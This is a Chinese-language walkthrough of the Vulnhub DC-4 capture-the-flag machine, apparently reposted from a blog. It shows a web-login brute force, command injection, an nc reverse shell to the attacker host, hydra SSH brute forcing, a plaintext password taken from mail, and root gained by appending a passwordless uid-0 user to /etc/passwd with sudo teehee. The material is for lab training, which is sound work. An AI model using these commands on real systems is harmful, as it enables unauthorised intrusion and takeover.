说明:Vulnhub是一个渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习,实践。DC-4全程只有一个falg,获取root权限,以下内容是自身复现的过程,总结记录下来,如有不足请多多指教。
下载地址:
Download (Mirror):
https://download.vulnhub.com/dc/DC-4.zip
目标机IP地址:192.168.16.142
攻击机kali IP地址:192.168.16.138
arp-scan -l
端口扫描
nmap -sV -p- 192.168.16.142 开放了80与22。
访问80端口。
根据提示页面提示可以使用admin用户登陆,尝试对它进行爆破,使用burp中的Intuder模块。
爆破后发现密码为happy时,响应正文的长度较长,使用happy尝试登陆一下。
登陆成功用户名admin,密码happy。
随意点一点,点击Command以后run一下发现可以执行命令。
使用burp进行抓包,结合Repeater对数据包进行重放尝试执行其他命令。执行成功。
尝试反弹shell,首先攻击机监听7777端口,等待 .......
nc -e /bin/bash 192.168.16.138 7777
反弹成功。
python -c 'import pty;pty.spawn("/bin/bash")' 转换交互式shell,对目录文件进行检查,查看用户 cat /etc/passwd。
进入这几个用户的家目录进行信息收集。jim用户发现了一个关于密码的文件,
/home/jim/backups/old-passwords.bak 将文件进行保存。无权查看mbox文件。查看test.sh未发现有用信息。
ssh爆破刚刚在jim用户里发现了一个关于密码的文件,使用hydra进行爆破
hydra -l jim -P dc4pass.txt ssh://192.168.16.142
爆出密码后进行登录 ssh [email protected]
打开mbox 是来自root的一封邮件大致的内容是这是一个测试。
进入邮件服务目录查看邮件发现了一封由charles发给jim的密码邮件。
cat /var/mail/jim
切换用户charles/^xHhA&hvim0y。
sudo -l :列出目前用户可执行与无法执行的指令。
发现teehee命令无需root用户密码即可以root权限执行。
查看teehee命令的作用。
teehee:输入输出文件。这里使用-a 选项 追加不覆盖。
使用teehee -a 创建一个用户拥有root权限的用户。
参照/etc/passwd 。
root:x:0:0:root:/root:/bin/bash
echo dc41::0:0:::/bin/bash | sudo teehee -a /etc/passwd
进入root用户家目录发现flag成功夺旗。
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
本文始发于微信公众号(thelostworld):DC-4靶机解题思路
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论